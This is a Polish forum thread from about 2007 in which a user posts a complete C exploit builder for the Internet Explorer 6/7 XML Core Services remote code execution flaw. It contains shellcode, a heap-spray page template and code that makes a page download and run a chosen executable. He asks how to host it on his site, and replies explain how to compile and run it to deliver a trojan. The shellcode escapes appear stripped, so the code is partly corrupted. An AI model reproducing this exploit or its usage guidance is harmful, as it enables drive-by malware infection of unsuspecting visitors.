Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki od 1 do 15 z 18
  1. #1
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie Mam exploit, ale nie wiem co z nim zrobić oO

    Witam wszystkich!
    Mam następujący problem:
    Gdy chcę umieścić exploit w index.php i gdy wrzucę na serwer to robi mi się coś takiego:
    Klik
    Próbowałem i IE 6 i Firefoxem i Safari i wszędzie to samo :/

    A więc oto exploit:

    Kod:
    /*
    
    *-----------------------------------------------------------------------
    
    *
    
    * MS Internet Explorer 6/7 (XML Core Services)**Remote Code Execution Exploit
    
    *****Works on**Windows XP versions including SP2 and 2K 
    
    *
    
    * Author: M03
    
    *
    
    *****Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), 
    
    *** Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
    
    ***********:
    
    * Tested** : 
    
    ***********: Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
    
    ***********:
    
    ***********:
    
    ***********:
    
    ***********:
    
    ***********:Usage: filename <exe_URL> [htmlfile]
    
    ***********:****** filename.exe http://site.com/file.exe localhtml.htm******
    
    ***********
    
    *------------------------------------------------------------------------
    
    */
    
    
    
    #include <stdio.h>
    
    #include <stdlib.h>
    
    #include <string.h>
    
    
    
    FILE *fp = NULL;
    
    char *file = "MicroHack.htm";
    
    char *url = NULL;
    
    
    
    unsigned char sc[] =**** 
    
    "xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
    
    "xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
    
    "x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
    
    "x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
    
    "xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
    
    "x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
    
    "x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
    
    "x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
    
    "x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
    
    "xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
    
    "x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
    
    "xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
    
    "xFFxFFx52xFFxD0xE8xD7xFFxFFxFF";
    
    
    
    char * header =
    
    "<html xmlns="http://www.w3.org/1999/xhtml">n"
    
    "<body>n"
    
    "<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >n"
    
    "</object>n"
    
    "<script>n"
    
    "var obj = null;n"
    
    "function exploit() {n"
    
    "obj = document.getElementById('target').object;n"
    
    
    
    "try {n"
    
    "obj.open(new Array(),new Array(),new Array(),new Array(),new Array());n"
    
    "} catch(e) {};n"
    
    
    
    "sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +n"
    
    " ";
    
    
    
    char * footer =
    
    "n"
    
    "sz = sh.length * 2;n"
    
    "npsz = 0x400000-(sz+0x38);n"
    
    "nps = unescape ("%u0D0D%u0D0D");n"
    
    "while (nps.length*2<npsz) nps+=nps;n"
    
    "ihbc = (0x12000000-0x400000)/0x400000;n"
    
    "mm = new Array();n"
    
    "for (i=0;i<ihbc;i++) mm[i] = nps+sh;n"
    
    "n"
    
    "obj.open(new Object(),new Object(),new Object(),new Object(), new Object());n"****
    
    "n"
    
    "obj.setRequestHeader(new Object(),'......');n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "obj.setRequestHeader(new Object(),0x12345678);n"
    
    "}n"
    
    "</script>n"
    
    "<body onLoad='exploit()' value='Exploit'>n"
    
    "n"
    
    "</body></html>n"
    
    "n";
    
    
    
    // print unicode shellcode
    
    void PrintPayLoad(char *lpBuff, int buffsize)
    
    {
    
    ** int i;
    
    ** for(i=0;i<buffsize;i+=2)
    
    ** {
    
    ****** if((i%16)==0)
    
    ****** {
    
    ********** if(i!=0)
    
    ********** {
    
    ************** printf(""n"");
    
    ************** fprintf(fp, "%s", "" +n"");
    
    ********** }
    
    ********** else
    
    ********** {
    
    ************** printf(""");
    
    ************** fprintf(fp, "%s", """);
    
    ********** }
    
    ****** }
    
    ********** 
    
    ****** printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    
    ****** 
    
    ****** fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
    
    **** }
    
    **** 
    
    
    
    ****** printf("";n");
    
    ****** fprintf(fp, "%s", "");n");**********
    
    ** 
    
    ** 
    
    ** fflush(fp);
    
    }
    
    
    
    void main(int argc, char **argv)
    
    {
    
    ** unsigned char buf[1024] = {0};
    
    
    
    ** int sc_len = 0;
    
    
    
    
    
    ** if (argc < 2)
    
    ** {
    
    ******printf("MS Internet Explorer 6/7 (XML Core Services)**Remote Code Execution Exploit (0day)n");
    
    ******printf("Code modded from LukeHackn");
    
    ******printf("rnUsage: %s <URL> [Local htmlfile]rnn", argv[0]);
    
    ******exit(1);
    
    ** }
    
    ** 
    
    ** url = argv[1];
    
    ** 
    
    
    
    ****if( (!strstr(url, "http://") &&**!strstr(url, "ftp://")) || strlen(url) < 10)
    
    ****{
    
    ********printf("[-] Invalid url. Must start with 'http://','ftp://'n");
    
    ********return;****************
    
    ****}
    
    
    
    ******printf("[+] download url:%sn", url);
    
    ******
    
    ******if(argc >=3) file = argv[2];
    
    ******printf("[+] exploit file:%sn", file);
    
    ****** 
    
    ** fp = fopen(file, "w");
    
    ** if(!fp)
    
    ** {
    
    ****** printf("[-] Open file error!n");
    
    **********return;
    
    ** }****
    
    ** 
    
    ** fprintf(fp, "%s", header);
    
    ** fflush(fp);
    
    ** 
    
    ** memset(buf, 0, sizeof(buf));
    
    ** sc_len = sizeof(sc)-1;
    
    ** memcpy(buf, sc, sc_len);
    
    ** memcpy(buf+sc_len, url, strlen(url));
    
    ** 
    
    ** sc_len += strlen(url)+1;
    
    ** PrintPayLoad(buf, sc_len);
    
     
    
    ** fprintf(fp, "%s", footer);
    
    ** fflush(fp);**
    
    ** 
    
    ** printf("[+] exploit write to %s success!n", file);
    
    }
    
    
    
    // Reverse Microsoft IE 9/11 Exploit
    
    
    
    // milw0rm.com [2006-11-10]


    Proszę pomóżcie

  2. #2
    Użytkownik
    Dołączył
    29-10-2005
    Posty
    190

    Domyślnie

    exploit w C (nie pisze w C, ani C++ wiec moge sie mylic co to dokladnie ; D) do PHP, no (auto cenzura) jestes! -.- czlowieku wez sie za klocki, a nie za exploity! ; [

  3. #3
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    Dokładna nazwa tego exploita:
    MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 3
    Więc nie rozumiem Cię, czemu ma to być w C (?)

    @EDIT:
    Zamiast gadać bez sensu jaki ja jestem niekumaty itd. byś już mi dawno wytłumaczył ocb z tym exploitem -.-

  4. #4
    Użytkownik
    Dołączył
    29-10-2005
    Posty
    190

    Domyślnie

    prosze. -.-

    Usage: filename <exe_URL> [htmlfile] :
    filename.exe http://site.com/file.exe localhtml.htm[/b]
    filename.exe (exploit)
    http://site.com/file.exe (skad ma sciagnac plik)
    localhtml.htm (zapisanie pliku, jak go odpalisz to sciaga i odpala exe.)

    oczywiscie moge sie mylic -.-

  5. #5
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    Tylko, że mi nie o to chodzi ;/
    W 1 poście podałem stronkę, gdzie zrobiłem tak i wszystko jest rozwalone oO tzn look:
    www.xtremex-ftp.yoyo.pl

    I mi tylko chodzi o to, żeby działał ten exploit na serwie...

    Za to wyżej thx :] Też się przyda

  6. #6
    Użytkownik
    Dołączył
    29-10-2005
    Posty
    190

    Domyślnie

    Originally posted by Xtremex
    Tylko, że mi nie o to chodzi ;/
    W 1 poście podałem stronkę, gdzie zrobiłem tak i wszystko jest rozwalone oO tzn look:
    www.xtremex-ftp.yoyo.pl

    I mi tylko chodzi o to, żeby działał ten exploit na serwie...

    Za to wyżej thx :] Też się przyda
    tak.

    Originally posted by boness
    localhtml.htm (zapisanie pliku, jak go odpalisz to sciaga i odpala exe.)
    wtedy bedzie dzialal... bo jak sie domyslam, to wlasnie o to ci chodzi, zeby trojan sam sie sciagal... ale exploit z 2006, wiec juz raczej nikogo nie znajdziesz zeby na to sie nadzial ;]

  7. #7
    Użytkownik
    Dołączył
    14-12-2006
    Skąd
    Z nienacka
    Posty
    656

    Domyślnie

    Ty chyba jesteś nie poważny. Wygląda mi na to, że Twój serwer nie obsługuje php (mogę się mylić) a Ty wrzucasz do niego program w C do pliku php i chcesz, żeby działało. Jedyna możliwość na wykonanie programu w C po stronie serwera to CGI, ale w przypadku tego programu nic Ci to nie da. Radziłbym zająć się czym innym, a nie exploitami

  8. #8
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    Serwer php obsługuje na 100% (5)
    A więc biorę się do roboty ^^

  9. #9
    Użytkownik
    Dołączył
    27-06-2007
    Posty
    32

    Domyślnie

    Powaliło mnie. Lol ty w ogóle znasz podstawy php - mi się wydaje że nie. Co to ma w ogóle być : (źródło twojej strony)
    <php>
    /*
    *-----------------------------------------------------------------------
    *
    * MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit
    * Works on Windows XP versions including SP2 and 2K[/b]
    i zakończenie:
    // milw0rm.com [2006-11-10]

    </php>[/b]
    Może się mylę ( ale na pewno nie) tak początku i końca dokumentu php się nie oznacza. Od razu powiem jak, bo ty[nie napisze tego na co miałem ochotę bo bym dostał bana] a więc:
    początak : <?php zakończenie ?> albo
    początak : <? zakończenie ?> albo
    początak : <script language="php"> zakończenie </script>

    I jeszcze powiem że to masz zapisać jako: cośtam.php lub cośtam.php3 lub cośtam.php4 lub cośtam.php5 lub cośtam.phtml

  10. #10
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    Zrobiłem tak jak kazałeś, ale wyskauje mi puste pole nawet jak IE otwieram

  11. #11
    Użytkownik
    Dołączył
    27-06-2007
    Posty
    32

    Domyślnie

    zrób tak:

    <?
    walnij exploita
    ?>

    i zapisz jako index.php

    dałeś to na serwer??

  12. #12
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    http://www.xtremex-ftp.yoyo.pl/lol.php

    Tylko, że tutaj jest błąd...
    Zaraz wrzuce na cba to zobaczymy czy tam tez


    @EDIT:
    Linia 29 wygląda tak:
    "x24x03Dx66x8Bx0Cx4Bx8Bx5Ex1Cx03Dx8Bx04x8Bx03"

  13. #13
    Użytkownik
    Dołączył
    02-07-2007
    Skąd
    Biała Podlaska
    Posty
    108

    Domyślnie

    Idioci!

    Po co mu każecie ten kod w C dać na serwer i oznaczyć jako kod w php ?

    omfg

    Dam radę: Skompiluj to przy pomocy kompilatora C.
    a potem w cmd
    skompilowany_plik.exe http://site.com/plik.exe localcostam.html i jedziesz

  14. #14
    Użytkownik
    Dołączył
    27-06-2007
    Posty
    32

    Domyślnie

    Czy ja mu każe dawać go na serwer. Ja go uczę podstaw php. Jak powinien wyglądać dokument php i jak go zapisać. A zresztą niech się chłopak samemu pomęczy. Niech to nie wygląda tak: Rejestracja na forum->pierwszy post->ktoś mu problem rozwiąże->dziękuję bardzo i mam was wszystkich teraz głęboko w dup*e. Poszukaj na forum, na pewno znajdziesz a jak nie to dopiero pytaj!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    Po co mu każecie ten kod w C dać na serwer i oznaczyć jako kod w php ?[/b]
    - bo sie o to pyta i go na serv chce dać.
    Jak mu nie będzie wychodzić to sie skapnie że coś źle zrobił.

  15. #15
    Użytkownik
    Dołączył
    24-07-2007
    Posty
    23

    Domyślnie

    Szuja mi wszystko dobrze wyjaśnił
    Thx ;]

Podobne wątki

  1. Odpowiedzi: 2
    Ostatni post / autor: 08-04-2013, 15:56
  2. Początki z informatyką(bo wiem, że nic nie wiem :D)
    Przez Beert
    w forum Dla początkujących
    Odpowiedzi: 3
    Ostatni post / autor: 12-12-2011, 20:14
  3. Mam email i hasło - a nie wiem co zrobić
    Przez unlock
    w forum Dla początkujących
    Odpowiedzi: 14
    Ostatni post / autor: 25-07-2008, 15:45
  4. Czy ten exploit działa? (jeśli to jest exploit)
    Przez Spens123
    w forum Exploits/PenTests
    Odpowiedzi: 3
    Ostatni post / autor: 30-12-2007, 21:53
  5. jakis exploit i nie wiem o co chodzi :/
    Przez kiela
    w forum Exploits/PenTests
    Odpowiedzi: 3
    Ostatni post / autor: 23-01-2005, 15:22

Uprawnienia

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •